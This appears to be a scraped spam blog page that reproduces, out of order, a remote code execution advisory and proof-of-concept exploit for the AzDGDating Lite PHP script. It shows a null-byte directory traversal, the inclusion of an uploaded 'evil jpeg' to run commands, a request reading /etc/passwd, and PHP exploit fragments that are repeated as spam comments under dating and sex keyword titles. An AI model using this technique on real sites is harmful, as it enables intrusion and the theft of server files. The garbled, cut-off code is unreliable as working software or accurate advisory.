Azdgdatinglite v 2 1 6

22-Oct-2015 10:12 posted by rosegirl486 | Leave a comment

feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here...

else { if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') { include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; } ...you can include arbitrary file on the server using "../" and null byte (%00) (to truncate path to the filename you choose), example: l=../../../../../../../[filename.ext]%00 at the begin of the script we have: @ob_start(); look at the php ob_ start man page : "This function will turn output buffering on.While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer." However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time ...but you can execute arbirtrary commands and after to see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (! l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd the output will be redirected to ./include/so you make a GET request of this file and you have /etc/passwd file this is my proof of concept exploit: '; function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!

eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -'; $ock=fsockopen($parts[0],$parts[1]); if (!

$ock) { echo ' No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!

Az DGDating Lite V 2.1.3 (possibly prior versions) remote code execution (not yet tested the Platinum version) software: site: download page:

l=english description:" Az DGDating Lite is a Free dating script working on PHP and My SQL.

Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable " etc.

vulnerability: look at the vulnerable code in ./include/php at lines ~80-90 ...

Leave a Reply

  1. corbin bleu dating 2016 22-Oct-2015 10:14

    feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here...

  2. write dating profile service 22-Oct-2015 10:14

    feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here...

  3. Cassiopeia sex model free live webcams 22-Oct-2015 10:14

    feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here...

  4. Sex chat bot penis humiliation 22-Oct-2015 10:14

    feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here...

  5. creator of the dating game 22-Oct-2015 10:14

    feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here...

  6. russian women datingsite net 22-Oct-2015 10:15

    feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((! eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here...

panama ladies dating